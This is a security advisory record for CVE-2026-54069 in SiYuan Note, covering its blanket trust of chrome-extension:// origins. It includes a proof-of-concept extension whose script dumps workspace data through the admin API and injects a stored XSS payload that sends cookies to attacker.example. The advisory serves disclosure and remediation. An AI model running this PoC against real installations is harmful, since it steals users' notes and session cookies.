{"id":"CVE-2026-54069","aliases":["GHSA-hvr9-72v2-fff3"],"title":"SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist","summary":"SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist","severity":"critical","cwe":["CWE-346"],"vendor":"siyuan-note","product":"github.com/siyuan-note/siyuan/kernel","ecosystem":"go","affected":["github.com/siyuan-note/siyuan/kernel < 0.0.0-20260628153353-2d5d72223df4"],"patched":["github.com/siyuan-note/siyuan/kernel 0.0.0-20260628153353-2d5d72223df4"],"published":"2026-07-10","updated":"2026-07-10","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-hvr9-72v2-fff3","references":[{"url":"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hvr9-72v2-fff3"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-54069"},{"url":"https://github.com/advisories/GHSA-hvr9-72v2-fff3"}],"tags":["ghsa","go"],"epss":0.00607,"epssPercentile":0.44852,"ingestedAt":"2026-07-10T20:06:10.828Z","slug":"CVE-2026-54069","body":"## Overview\n\n## Summary\n\nSiYuan Note's kernel HTTP server unconditionally trusts all `chrome-extension://` origins, granting `RoleAdministrator` access to every installed browser extension without any authentication. Combined with the default empty `AccessAuthCode` on desktop installs, any Chrome/Chromium extension -- including a compromised legitimate extension via supply chain attack -- can make fully authenticated admin API calls to the SiYuan kernel at `127.0.0.1:6806`, enabling data exfiltration, stored XSS injection, and configuration tampering.\n\n## Affected Versions\n\nSiYuan <= v3.6.5 (commit `96dfe0bea474`). The chrome-extension allowlist remains unfixed as of the latest commit on the fix branch (`d7b77d945e0d`).\n\n## Vulnerability Details\n\n### Blanket chrome-extension:// Origin Trust (CWE-346)\n\nIn `kernel/model/session.go:277`, the `CheckAuth` middleware exempts all `chrome-extension://` origins from authentication:\n\n```go\nif strings.HasPrefix(origin, \"chrome-extension://\") {\n    // skip auth\n}\n```\n\nAt `session.go:284`, the request is assigned `RoleAdministrator`:\n\n```go\nc.Set(\"role\", model.RoleAdministrator)\n```\n\nThe `AccessAuthCode` field defaults to an empty string for desktop installs (`ContainerStd`). When empty, no token validation occurs. This means **any** Chrome/Chromium extension can make fully authenticated admin API calls to the SiYuan kernel.\n\nThe origin check trusts the entire `chrome-extension://` scheme rather than validating a specific extension ID, so every installed extension (including those with no explicit `host_permissions`) can access all admin endpoints.\n\n## Proof of Concept\n\n**Unauthenticated admin API access via browser extension:**\n\nA minimal Chrome extension with only default permissions:\n\n```json\n{\n  \"manifest_version\": 3,\n  \"name\": \"SiYuan PoC\",\n  \"version\": \"1.0\",\n  \"background\": {\n    \"service_worker\": \"bg.js\"\n  }\n}\n```\n\n```javascript\n// bg.js -- runs as chrome-extension://<id>\n// No special host_permissions needed; localhost is accessible by default\n\n// 1. Verify admin access\nfetch('http://127.0.0.1:6806/api/system/getConf', {\n  method: 'POST',\n  headers: { 'Content-Type': 'application/json' },\n  body: '{}'\n}).then(r => r.json()).then(data => {\n  console.log('[PoC] Admin API access confirmed:', data.code === 0);\n});\n\n// 2. Exfiltrate workspace data\nfetch('http://127.0.0.1:6806/api/query/sql', {\n  method: 'POST',\n  headers: { 'Content-Type': 'application/json' },\n  body: JSON.stringify({ stmt: 'SELECT * FROM blocks LIMIT 100' })\n}).then(r => r.json()).then(data => {\n  console.log('[PoC] Exfiltrated blocks:', data.data?.length);\n});\n\n// 3. Inject stored XSS payload into a note\nfetch('http://127.0.0.1:6806/api/filetree/listDocsByPath', {\n  method: 'POST',\n  headers: { 'Content-Type': 'application/json' },\n  body: JSON.stringify({ notebook: '', path: '/' })\n}).then(r => r.json()).then(tree => {\n  const firstDoc = tree.data?.files?.[0];\n  if (!firstDoc) return;\n\n  fetch('http://127.0.0.1:6806/api/block/insertBlock', {\n    method: 'POST',\n    headers: { 'Content-Type': 'application/json' },\n    body: JSON.stringify({\n      dataType: 'markdown',\n      data: '<img src=x onerror=\"fetch(\\'https://attacker.example/steal?data=\\'+document.cookie)\">',\n      parentID: firstDoc.id\n    })\n  });\n});\n```\n\nThe extension requires zero special permissions. The `chrome-extension://` origin header is automatically sent by the browser, and `session.go:277` grants it `RoleAdministrator` without any token check.\n\n## Impact\n\n- **Unauthenticated admin API access** for any installed browser extension, enabling full control of the SiYuan kernel\n- **Data exfiltration** of the entire workspace via `/api/query/sql`, `/api/filetree/`, `/api/export/`\n- **Stored XSS injection** via admin API endpoints (`/api/block/insertBlock`, `/api/attr/setBlockAttrs`), persisted in the user's notes\n- **Configuration tampering** via `/api/system/setConf`, enabling persistence and further attack surface expansion\n- **Supply chain amplification**: a single compromised popular Chrome extension update can silently exploit every SiYuan desktop user\n\n## Suggested Remediation\n\n**Remove blanket chrome-extension:// allowlist:**\n\n```diff\n--- a/kernel/model/session.go\n+++ b/kernel/model/session.go\n@@ -274,9 +274,6 @@\n func CheckAuth(c *gin.Context) {\n     origin := c.GetHeader(\"Origin\")\n-    if strings.HasPrefix(origin, \"chrome-extension://\") {\n-        // Allow chrome extension requests\n-    } else\n     if !isValidOrigin(origin) {\n         c.AbortWithStatusJSON(401, gin.H{\"code\": -1, \"msg\": \"invalid origin\"})\n         return\n```\n\nIf extension access is required, implement a per-session token exchange: the SiYuan UI generates a random token on startup, and the extension must present it via a dedicated pairing endpoint. This ensures only explicitly authorized extensions can access the API.\n\n## Affected packages\n\n- `github.com/siyuan-note/siyuan/kernel < 0.0.0-20260628153353-2d5d72223df4`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/siyuan-note/siyuan/kernel 0.0.0-20260628153353-2d5d72223df4`","depth":"midnight","depthScore":52,"depthScoreParts":{"impact":52.3,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}